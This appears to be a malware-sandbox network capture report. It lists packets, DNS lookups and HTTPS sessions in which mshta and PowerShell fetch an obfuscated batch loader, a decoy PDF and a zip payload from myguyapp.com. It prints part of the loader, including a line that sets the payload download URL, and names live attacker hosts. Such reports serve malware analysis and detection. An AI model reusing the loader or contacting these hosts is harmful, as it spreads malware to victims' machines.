                                                                          Dec 12, 2024 19:07:24.952639103 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.952702999 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.952702999 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.952709913 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.953977108 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.958093882 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.958143950 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.958189964 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.958195925 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.958230019 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.958230019 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.963967085 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.964015961 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.964031935 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.964060068 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.964087009 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.964123964 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.970869064 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.970911026 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.970958948 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.970966101 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.971004963 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.971004963 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.976593018 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.976638079 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.976694107 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.976700068 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:24.976736069 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:24.976757050 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.088670015 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.127350092 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.127408028 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.127449989 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.127460957 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.127994061 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.132546902 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.132591963 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.132632971 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.132642984 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.132745981 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.132745981 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.139151096 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.139205933 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.139235973 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.139247894 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.139271021 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.139288902 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.142549038 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.142592907 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.142616987 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.142627954 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.142677069 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.142688036 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.142755032 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:25.143295050 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.330115080 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:25.405209064 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:10:21.446314096 CET497287007192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:10:21.571060896 CET700749728193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:10:21.571279049 CET497287007192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:10:21.680412054 CET497287007192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:10:21.801434040 CET700749728193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:10:36.041152954 CET497287007192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:10:36.161561012 CET700749728193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:10:45.764993906 CET700749728193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:10:45.818181038 CET497287007192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:10:50.396820068 CET497287007192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:10:50.517674923 CET700749728193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:11:04.755963087 CET497287007192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:11:04.877358913 CET700749728193.26.115.21192.168.2.8

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 12, 2024 19:07:08.322539091 CET6292553192.168.2.81.1.1.1
                                                                          Dec 12, 2024 19:07:08.650924921 CET53629251.1.1.1192.168.2.8
                                                                          Dec 12, 2024 19:07:25.106141090 CET5551053192.168.2.81.1.1.1
                                                                          Dec 12, 2024 19:08:01.974349022 CET5161153192.168.2.81.1.1.1
                                                                          Dec 12, 2024 19:08:02.197819948 CET53516111.1.1.1192.168.2.8
                                                                          Dec 12, 2024 19:10:21.122385025 CET5664653192.168.2.81.1.1.1
                                                                          Dec 12, 2024 19:10:21.442075014 CET53566461.1.1.1192.168.2.8

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 12, 2024 19:07:08.322539091 CET192.168.2.81.1.1.10x8c4aStandard query (0)myguyapp.comA (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:07:25.106141090 CET192.168.2.81.1.1.10xd6f6Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:08:01.974349022 CET192.168.2.81.1.1.10x3bb1Standard query (0)dwLscOsEZmpbOxr.dwLscOsEZmpbOxrA (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:10:21.122385025 CET192.168.2.81.1.1.10x3c4eStandard query (0)me-work.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 12, 2024 19:07:08.650924921 CET1.1.1.1192.168.2.80x8c4aNo error (0)myguyapp.com193.26.115.21A (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:07:25.421901941 CET1.1.1.1192.168.2.80xd6f6No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 12, 2024 19:07:40.619422913 CET1.1.1.1192.168.2.80xb40cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:07:40.619422913 CET1.1.1.1192.168.2.80xb40cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:07:54.237313986 CET1.1.1.1192.168.2.80x19cbNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:07:54.237313986 CET1.1.1.1192.168.2.80x19cbNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:08:02.197819948 CET1.1.1.1192.168.2.80x3bb1Name error (3)dwLscOsEZmpbOxr.dwLscOsEZmpbOxrnonenoneA (IP address)IN (0x0001)false
                                                                          Dec 12, 2024 19:10:21.442075014 CET1.1.1.1192.168.2.80x3c4eNo error (0)me-work.com193.26.115.21A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • myguyapp.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.849708193.26.115.214437864C:\Windows\SysWOW64\mshta.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-12 18:07:10 UTC301OUTGET /c.bat HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-CH
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                          Host: myguyapp.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-12 18:07:10 UTC288INHTTP/1.1 200 OK
                                                                          Date: Thu, 12 Dec 2024 18:07:10 GMT
                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                          Last-Modified: Thu, 12 Dec 2024 13:28:45 GMT
                                                                          ETag: "d68-62912b1984ca1"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 3432
                                                                          Connection: close
                                                                          Content-Type: application/x-msdownload
                                                                          2024-12-12 18:07:10 UTC3432INData Raw: 40 25 47 68 61 45 25 65 25 51 4f 4e 25 63 25 6f 56 4e 6c 78 68 53 25 68 25 59 63 63 25 6f 25 54 5a 53 47 5a 64 54 7a 73 67 25 20 25 6d 43 52 70 25 6f 25 6d 59 73 66 5a 70 58 42 75 50 25 66 25 64 65 6a 54 4d 76 25 66 25 72 4f 59 53 65 66 45 4f 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 66 59 55 73 62 6e 6f 25 65 25 6d 48 46 71 7a 4c 6c 76 6b 57 25 74 25 68 55 42 76 4b 4f 51 74 57 25 20 25 42 74 61 44 72 73 4a 63 4b 25 75 25 62 77 6a 25 72 25 62 6a 62 25 6c 25 63 70 73 57 54 78 25 3d 25 43 4d 79 66 61 49 25 68 25 4e 4e 44 43 25 74 25 53 5a 47 25 74 25 73 67 25 70 25 77 79 74 64 58 73 48 25 73 25 58 4c 66 59 52 68 4f 25 3a 25 62 77 61 58 4a 53 5a 63 72 25 2f 25 76
                                                                          Data Ascii: @%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%set url=https://myguyapp.com/msword.zips%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%v


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.849710193.26.115.214438184C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-12 18:07:12 UTC162OUTGET /f.pdf HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                          Host: myguyapp.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-12 18:07:13 UTC283INHTTP/1.1 200 OK
                                                                          Date: Thu, 12 Dec 2024 18:07:13 GMT
                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                          Last-Modified: Mon, 28 Oct 2024 21:28:02 GMT
                                                                          ETag: "4374e-6259024c862cf"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 276302
                                                                          Connection: close
                                                                          Content-Type: application/pdf
                                                                          2024-12-12 18:07:13 UTC7909INData Raw: 25 50 44 46 2d 31 2e 34 0d 0a 25 c2 80 c2 81 c2 82 c2 83 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 20 0d 0a 20 20 20 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 31 20 0d 0a 20 20 20 2f 43 6f 6c 6f 72 53 70 61 63 65 20 33 20 30 20 52 20 0d 0a 20 20 20 2f 48 65 69 67 68 74 20 33 32 38 38 20 0d 0a 20 20 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 0d 0a 20 20 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 0d 0a 20 20 20 2f 57 69 64 74 68 20 32 35 36 30 20 0d 0a 20 20 20 2f 46 69 6c 74 65 72 20 5b 0d 0a 20 20 20 20 2f 43 43 49 54 54 46 61 78 44 65 63 6f 64 65 20 20 5d 0d 0a 20 20 20 0d 0a 20 20 20 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 0d 0a 20 20 20 20 3c 3c 20 0d 0a 20 20 20 20 20 20 2f 42 6c 61 63 6b 49 73 31 20 74 72 75 65 20 0d 0a 20 20
                                                                          Data Ascii: %PDF-1.4%1 0 obj<< /BitsPerComponent 1 /ColorSpace 3 0 R /Height 3288 /Subtype /Image /Type /XObject /Width 2560 /Filter [ /CCITTFaxDecode ] /DecodeParms [ << /BlackIs1 true
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: fe f7 fc 8c 7f ff ff 55 fd ef fe df fa 8d 69 3f 7e 71 11 d6 be 97 fd 97 0b fb f1 12 2b 58 a7 56 ab ff 17 fd fe af 65 c1 ff ef ff fa 76 37 ff fd bf d6 d2 5f bf ff ff 7f ff f6 fa f7 bf f9 11 c2 fe f9 15 ac b1 4a ff ea 10 fe ff fc 8b cf fb db f8 fe 43 8e 50 ef 0e fb 7d e9 6f e8 47 4e be 43 13 af ff ff ff ef df d3 f7 7f ad d7 ff df 56 d2 fb 4b 7f bb bd ef bb 6d 7e 41 43 58 a6 b5 aa b0 d6 43 47 10 50 a0 30 bf 7c 8b ab bd f8 30 4a ee 2b 7f 5e b5 e3 f6 bf fb ff 6b da df e9 ee fd af 0d 7f af bf 86 bd 84 e1 a6 bd eb 7c 30 9a 06 55 94 39 14 70 88 98 41 11 da 68 44 44 18 21 11 11 1c 44 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c8 09 f0 b8 20 79 01 85 01 0a 9b 25 04 10 79 01 05 d1 7c 8e c8 ec d4 32 5c 50 44 18 04 78 4f 29 95 26 4b 45 3b d1 95 01 b0 a7 20
                                                                          Data Ascii: Ui?~q+XVev7_JCP}oGNCVKm~ACXCGP0|0J+^k|0U9pAhDD!D y%y|2\PDxO)&KE;
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: ff fc 89 22 97 91 f2 0c c8 90 f3 58 c8 36 48 14 8c 1e 4c 05 04 18 41 90 e0 40 cc c3 00 83 33 0c 02 0c d1 a6 10 71 68 3f d3 4d 6d 3f 91 2d a2 3c 7f 5e 46 f2 0b 12 e4 55 99 39 11 83 22 c2 eb 9b 18 22 28 b1 2a 14 38 86 6a 0a 62 34 82 06 7c 30 08 32 1c 13 04 c1 0c 20 c1 10 20 e1 a1 0e d3 4d 3f 09 da 7f 85 44 47 68 8e 1c 84 bc 97 bf a6 e9 fc b7 30 21 06 29 4e 2d 82 98 59 81 41 11 06 cf 00 c1 03 21 a2 3a 04 18 20 60 98 41 94 06 08 c0 c4 43 04 19 30 08 84 34 2d 34 ed 03 43 40 d5 06 a8 3f 4f 4f d1 08 3e 42 43 44 5b 6d 35 c8 b8 e0 9d 27 84 ea 1f e9 d2 6d f0 40 ca 18 20 c2 74 10 87 84 0c 20 d0 86 10 68 44 35 40 c2 0d 3b 86 83 d3 5c 27 ae ab aa de 88 b8 da 91 df e0 83 70 9d 04 e5 06 43 3d 04 e9 3d 3d 37 5f d3 7f 5a 68 5a 17 c5 a0 ed 38 b0 9a 7f ae 9f c8 dd d2 22 db
                                                                          Data Ascii: "X6HLA@3qh?Mm?-<^FU9""(*8jb4|02 M?DGh0!)N-YA!: `AC04-4C@?OO>BCD[m5'm@ t hD5@;\'pC===7_ZhZ8"
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: 23 85 e2 a2 98 e2 9a ff 76 bf ab e9 a6 98 54 d0 88 86 08 89 b2 3e 22 19 46 e6 96 be 2b 90 9d d8 e3 63 f7 a7 6b fd a0 c2 6a 9a 0d 34 19 0b 61 08 83 04 0c 12 86 10 88 8e d7 bf 7e d5 3f 4c 26 98 4d 53 54 d3 08 30 9a 11 06 08 30 84 44 68 71 f6 b7 fa a6 43 be a4 c7 08 34 c2 0c 20 64 7b 17 04 22 23 fe 18 55 b4 d3 04 47 52 e0 20 61 08 e1 84 19 19 72 cd c2 a3 88 64 55 94 22 75 31 c4 71 11 6b 11 1f 6b f1 d7 ff ff f7 61 62 3f ff ff ff ff ff ff ff ff ef fa ff ff ff ff fe ff af fe ff ff ff ff ff ff ff ff ff ff ff ff ff 94 c2 9b cb 6d 69 fd ae 5a a6 a1 0e c5 33 b4 0b d9 5d 5d 96 69 f2 3b 32 10 64 71 9a 65 c1 0e 80 dc 20 66 a0 6e 83 5f 0b 96 61 34 50 66 98 21 22 d6 4a b2 c1 90 cd c2 75 93 a0 86 10 83 b4 1f af 5e 59 4c 22 e8 be 47 22 f9 9b 23 99 1d 17 23 38 a0 18 3a 0a
                                                                          Data Ascii: #vT>"F+ckj4a~?L&MST00DhqC4 d{"#UGR ardU"u1qkkab?miZ3]]i;2dqe fn_a4Pf!"Ju^YL"G"##8:
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: f2 46 68 83 fb ff b9 4e ff da ff 0d 87 77 ff 44 63 be bd b4 0c 20 79 a3 77 b5 db 5b 4e ff bf f7 39 3f ff d7 7f ff a7 f1 f1 5e eb b7 ff 9c 2d 07 fa 5f a4 de bf 6b 7f ab 5b b6 17 af ff fe fe fa 5c 8f 9b 46 12 57 6b ee 96 ba ff 56 b6 bd 75 fd ff b6 bb c4 44 97 5b b4 be 18 56 2b fd 76 1a 4d af ff f8 5b 5e c2 5f ef 15 ec 57 fd 6f 1d a5 a6 b7 fb 0c 24 c5 6c 76 ba 4c 3f da 6b f7 e9 a6 3b df fe 3f 6b f4 ba f6 9a 77 f6 dd aa ff fd a6 b6 15 35 4d 06 a4 dc 21 10 61 03 04 3f 5b 4d 06 16 ff 5b 4d 06 84 30 85 a1 11 c4 47 76 ab 0c 10 61 06 10 88 88 88 32 2a 72 39 01 d4 44 68 96 8a 0c e3 82 11 1f c4 47 d7 d2 df f5 d6 98 5e 3d 63 bf ff ff ff ff f9 67 7f ac 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd d5 cb 30 28 ce 88 ba 21 b3 a6 50 b2 ce 2f 90 f2
                                                                          Data Ascii: FhNwDc yw[N9?^-_k[\FWkVuD[V+vM[^_Wo$lvL?k;?kw5M!a?[M[M0Gva2*r9DhG^=cg0(!P/
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: ea 08 c0 a1 7c 8e 9c 56 d5 44 e8 9b d4 33 ba 08 c3 da 87 84 08 7e 11 c4 53 e1 9e 29 91 d6 bc 1e 1a 4f 48 c2 13 a2 86 b2 e3 40 89 58 77 16 92 97 c4 bf 0d 3f c1 1c 7e 47 5d 5e 14 c6 22 61 58 71 42 a8 22 28 e0 fa 4e c2 9b 49 0d b8 c7 61 38 7a a8 6b 30 a1 37 88 20 46 05 8f ae 28 12 d4 47 14 c4 17 08 3d 68 25 a4 21 bc 36 60 6f f7 a0 81 05 98 48 10 b6 5d 62 08 f6 3d 30 aa 12 08 2d 04 1f a0 8a 70 8b ea d1 1d 78 45 0e bf 31 d0 73 3f 08 a1 d7 91 d6 81 11 fd f3 08 63 61 1c 5d 68 21 f1 f7 68 c6 33 c4 4c 75 49 42 07 c4 3b f9 84 2d 50 98 ea 92 84 38 bb fc 28 3a 7f 8d 16 39 87 ce ea d8 df 15 61 a7 6b 58 41 ed 62 85 21 88 4a ac c0 47 57 18 28 df 16 a1 55 c1 11 ee a6 7a 5b 48 a1 dd c4 d3 1b 40 8a f0 e3 d2 08 2e 9d dd d3 48 60 88 f8 6c 11 44 45 3f ee 18 60 c6 a5 44 5a ef
                                                                          Data Ascii: |VD3~S)OH@Xw?~G]^"aXqB"(NIa8zk07 F(G=h%!6`oH]b=0-pxE1s?ca]h!h3LuIB;-P8(:9akXAb!JGW(Uz[H@.H`lDE?`DZ
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: ad 18 4b 1a 97 ef 54 81 15 08 45 dc fc a5 f3 f9 7c bd 58 8b b9 9f 64 78 f6 5f 30 ab 11 dc cd 18 cc 22 46 5d 35 42 3b 44 34 6a 4d 0a ed 6c 22 46 51 97 eb 73 aa c5 a7 1f ac 68 a3 3a e1 c4 53 b5 b8 84 1d c9 f2 13 d0 4c 64 f9 74 6b 56 35 88 88 88 b1 89 f4 5f 35 f5 88 88 88 be 26 32 0d 0a e3 42 2d 0e e2 44 d1 8e 61 d3 5c d0 58 e6 1f 2d c2 30 84 41 15 07 7c c3 98 70 53 0f 8a 16 b5 43 40 88 e1 4e 71 5f 10 96 61 e9 31 ab 14 a2 3d a0 44 7f 49 53 bb 51 b5 11 0a 35 fd c3 65 4e 47 6c a1 ca 71 8a 69 59 1f 36 81 12 1f 1d 29 74 81 17 59 81 92 22 3f 70 40 8e 3d d8 e3 23 e2 66 8c 69 90 f3 ea ae f2 3d f9 1d 20 45 d2 66 11 7d 06 92 c2 23 e0 8e 39 87 c4 44 64 7e ec 4c 44 3c 4b ac 11 c7 a1 64 7d 6f cf e2 63 3a 21 2f dd c6 47 93 b4 d4 fe 26 10 97 5d e9 9e d5 35 11 2e b3 3d 32
                                                                          Data Ascii: KTE|Xdx_0"F]5B;D4jMl"FQsh:SLdtkV5_5&2B-Da\X-0A|pSC@Nq_a1=DISQ5eNGlqiY6)tY"?p@=#fi= Ef}#9Dd~LD<Kd}oc:!/G&]5.=2
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: 49 82 fd d7 b0 6b 54 ec 35 0e f3 0f 4c bb 60 a1 08 87 ff c3 83 c3 41 b5 62 e2 14 44 f6 f6 20 8a bb 84 71 e5 91 50 33 76 bf 07 f5 f8 3d ce e0 31 8b 62 13 15 34 44 76 a9 82 67 11 84 10 4e da f8 41 60 cc 38 ba c2 67 30 47 1f 61 cb ea b0 44 7d 8a 72 c8 14 1a 4d 8f e1 f6 fd 58 3b a2 64 19 99 27 36 74 e8 24 20 f9 1e 85 40 b8 2d ff 88 82 04 0a 1c 48 fb 74 47 e2 c8 f1 cc df 97 63 15 a0 84 5c b2 16 06 b7 f8 7f 4b e1 f8 22 1a 6c 81 24 3b 6c da 4c 30 92 2e b1 b1 75 08 21 9d d9 84 be 96 6f 43 34 93 23 cd 04 56 43 8d a0 ed b4 58 f1 09 98 ac b2 0b 02 a6 4a 1f ef b7 f4 c1 db 40 88 6d 32 0c e2 c3 15 14 82 0c be 2e 35 e1 b1 06 df 7c 42 2d d4 32 3f 41 02 23 a0 98 b9 cd 30 e1 bb 23 a6 9b 34 56 1b 23 c1 02 cb 20 90 32 bf fb 7e 97 b0 7e 08 3c ba 12 f5 c1 25 4a 7d 67 f0 81 0b
                                                                          Data Ascii: IkT5L`AbD qP3v=1b4DvgNA`8g0GaD}rMX;d'6t$ @-HtGc\K"l$;lL0.u!oC4#VCXJ@m2.5|B-2?A#0#4V# 2~~<%J}g
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: b1 65 3b 4c 22 a8 7e 82 4d 84 b6 55 b1 15 41 11 f5 ad 2b 45 db 62 3f fe 35 44 1b 47 f2 c7 ff ff d7 ef 75 69 76 c4 42 36 bb 47 d4 e2 8f 6d b5 a4 20 c5 bc 48 e8 20 56 91 71 22 c2 1a 08 8f 98 df b8 52 6c c2 4d 7e 6a 83 1f bb fe dd 57 5f af fe b6 61 18 52 87 17 fa 4c a1 ca 78 30 84 45 bc fa 35 60 98 ff c9 0e 11 1d 36 6e 50 87 09 94 e0 8c 20 60 88 fa 2a 02 23 8a 08 13 68 11 1d 38 61 c2 23 ab 5f 6f 91 5c ce a2 e8 1a d9 27 20 90 4d d5 89 83 85 fa aa fa b0 d0 9c 71 10 69 af 4b 8b 89 f4 46 40 8a 78 dc 34 11 a6 db bd 53 e3 4c 5e 21 82 c2 87 16 08 12 4c 57 04 0b 68 11 43 82 0b b1 55 fb 63 b1 15 50 85 8d 3f 5a 5d 69 7e 1c 54 83 71 fd 28 5c 44 f3 48 be b6 47 44 74 48 d5 a6 50 7e f5 47 74 22 50 85 13 1e a5 d0 de 9a 29 d3 08 8f bf 0c 63 1e bf 4b 7f 08 84 82 f8 83 8f b4
                                                                          Data Ascii: e;L"~MUA+Eb?5DGuivB6Gm H Vq"RlM~jW_aRLx0E5`6nP `*#h8a#_o\' MqiKF@x4SL^!LWhCUcP?Z]i~Tq(\DHGDtHP~Gt"P)cK
                                                                          2024-12-12 18:07:13 UTC16384INData Raw: a2 3c e6 31 d4 47 1f b8 43 88 9c 88 e8 61 28 4e b1 04 12 77 f0 43 42 d1 1f 2f 18 c9 09 36 ed b1 23 a4 11 84 69 0f 06 60 52 3c 5f b3 e8 20 42 67 62 4e a9 6a a0 d0 60 ef f9 f4 26 d2 16 ea 7b 1d de 82 c2 55 36 2f a5 17 46 d0 d9 c4 9b ae c2 53 0f 0c 11 d3 bf a5 31 89 3f 6e 3b b6 2d 0c 8b 77 61 17 04 23 ae 82 2d d0 30 40 99 1d 62 a8 a1 e2 90 eb 8a 97 49 36 de af f0 fc 5f 3f 07 51 39 8a 25 62 f8 a1 41 06 2e c4 44 c4 0a 48 7b 09 23 12 d8 dd ee e8 23 49 8b 10 65 20 af 28 76 25 fc 8f 03 1f 08 32 a0 32 3a 96 e9 5b a3 e8 9e a0 8e 82 de 5e 11 5b a6 ce 27 f5 4c 4c 2b 73 71 8b 3c fd a3 da d9 1d be 82 65 00 90 f1 10 46 81 82 05 f6 a1 04 08 32 3a 05 4e 92 16 c4 ba 38 ae fc 52 23 ab 34 b4 82 46 12 2b 2a 37 6d 37 2a 22 14 61 38 6d 21 c3 d4 21 17 2e d8 49 1c d0 42 14 3b ee
                                                                          Data Ascii: <1GCa(NwCB/6#i`R<_ BgbNj`&{U6/FS1?n;-wa#-0@bI6_?Q9%bA.DH{##Ie (v%22:[^['LL+sq<eF2:N8R#4F+*7m7*"a8m!!.IB;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.849713193.26.115.21443964C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-12 18:07:18 UTC167OUTGET /msword.zip HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                          Host: myguyapp.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-12 18:07:18 UTC285INHTTP/1.1 200 OK
                                                                          Date: Thu, 12 Dec 2024 18:07:18 GMT
                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                          Last-Modified: Tue, 29 Oct 2024 16:49:11 GMT
                                                                          ETag: "3a0583-625a05d5cdaa6"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 3802499
                                                                          Connection: close
                                                                          Content-Type: application/zip
